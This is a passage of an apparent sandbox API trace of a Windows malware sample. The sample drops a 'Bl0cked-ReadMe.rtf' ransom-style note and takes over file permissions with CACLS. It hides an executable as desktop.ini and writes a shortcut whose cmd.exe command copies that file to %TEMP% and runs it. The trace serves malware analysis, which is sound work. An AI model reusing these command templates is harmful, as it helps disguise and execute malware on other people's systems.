%s") returned 0x19 [0149.093] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0149.094] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.094] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.094] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0149.094] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0149.094] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xc10, dwThreadId=0x390)) returned 1 [0149.095] 
WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] CloseHandle (hObject=0x110) returned 1 [0149.447] CloseHandle (hObject=0x114) returned 1 [0149.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] ReleaseMutex (hMutex=0xf8) returned 1 [0149.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] ReleaseMutex (hMutex=0xf8) returned 1 [0149.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] ReleaseMutex (hMutex=0xf8) returned 1 [0149.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.447] ReleaseMutex (hMutex=0xf8) returned 1 [0149.447] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.448] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x12eab4*="background.png") returned 0x66 [0149.448] GetLastError () returned 0x5 [0149.448] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0149.448] LocalFree (hMem=0x1c6cc8) returned 0x0 [0149.448] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, 
cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0149.448] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0149.448] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.448] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.448] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0149.448] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0149.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount2=88) returned 3 [0149.448] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0149.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0149.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0149.448] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0149.449] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0149.449] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0149.449] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\") returned 0x34 [0149.449] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0149.449] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0149.449] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"", 
lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x46c, dwThreadId=0x8d4)) returned 1 [0149.451] CloseHandle (hObject=0x110) returned 1 [0149.451] CloseHandle (hObject=0x114) returned 1 [0149.451] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\bl0cked-readme.rtf")) returned 0xffffffff [0149.451] GetLastError () returned 0x2 [0149.451] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0149.544] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\bl0cked-readme.rtf")) returned 0x20 [0149.544] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0149.544] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0149.545] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0149.545] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0149.545] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", 
lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0149.545] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0149.545] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0149.545] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\") returned 0x34 [0149.546] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0149.546] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0149.546] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1") returned 0x33 [0149.547] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x18a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{8702D~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{8702D~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{8702D~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{8702D~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x18a [0149.547] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0149.547] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x698, dwThreadId=0xc58)) returned 1 [0149.558] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0150.226] CloseHandle (hObject=0x114) returned 1 [0150.226] CloseHandle (hObject=0x110) returned 1 [0150.226] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0150.226] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0150.226] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0150.227] GetTickCount () returned 0x2e7bf [0150.227] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20701581076) returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="i\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="8\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="z\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="F\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="V\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="E\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="7\x1dﯸ\x12萀\x1d") returned 1 [0150.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="a\x1dﯸ\x12萀\x1d") returned 1 [0150.227] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0150.227] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0150.227] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0150.227] CharUpperBuffW (in: lpsz="explorer.exe \"{8702d817-5aad-4674-9ef3-4d3decd87120}\" & type \"{8702d817-5aad-4674-9ef3-4d3decd87120}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{8702D817-5AAD-4674-9EF3-4D3DECD87120}\" & TYPE \"{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0150.227] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") 
returned 0xa [0150.227] CharUpperBuffW (in: lpsz="explorer.exe \"{8702d817-5aad-4674-9ef3-4d3decd87120}\" & type \"{8702d817-5aad-4674-9ef3-4d3decd87120}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{8702D817-5AAD-4674-9EF3-4D3DECD87120}\" & TYPE \"{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0150.227] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0150.227] CoInitialize (pvReserved=0x0) returned 0x0 [0150.227] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0150.228] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0150.228] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0150.228] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0150.230] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"{8702d817-5aad-4674-9ef3-4d3decd87120}\" & type \"{8702d817-5aad-4674-9ef3-4d3decd87120}\\desktop.ini\" > \"%TEMP%\\i8zFVE7a.exe\" && \"%TEMP%\\i8zFVE7a.exe\"") returned 0x0 [0150.230] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 
[0150.230] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0150.230] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0150.230] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}.lnk", fRemember=0) returned 0x0 [0150.238] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0150.238] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0150.238] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0150.238] CoUninitialize () [0150.239] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.239] ReleaseMutex (hMutex=0xf8) returned 1 [0150.239] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.239] ReleaseMutex (hMutex=0xf8) returned 1 [0150.239] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.239] ReleaseMutex (hMutex=0xf8) returned 1 [0150.239] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.239] ReleaseMutex (hMutex=0xf8) returned 1 [0150.239] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.239] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", 
lpFilePart=0x12eab4*="watermark.png") returned 0x65 [0150.239] GetLastError () returned 0x5 [0150.239] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0150.239] LocalFree (hMem=0x1c6cc8) returned 0x0 [0150.239] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0150.240] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0150.240] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0150.240] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0150.240] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0150.240] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0150.240] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All 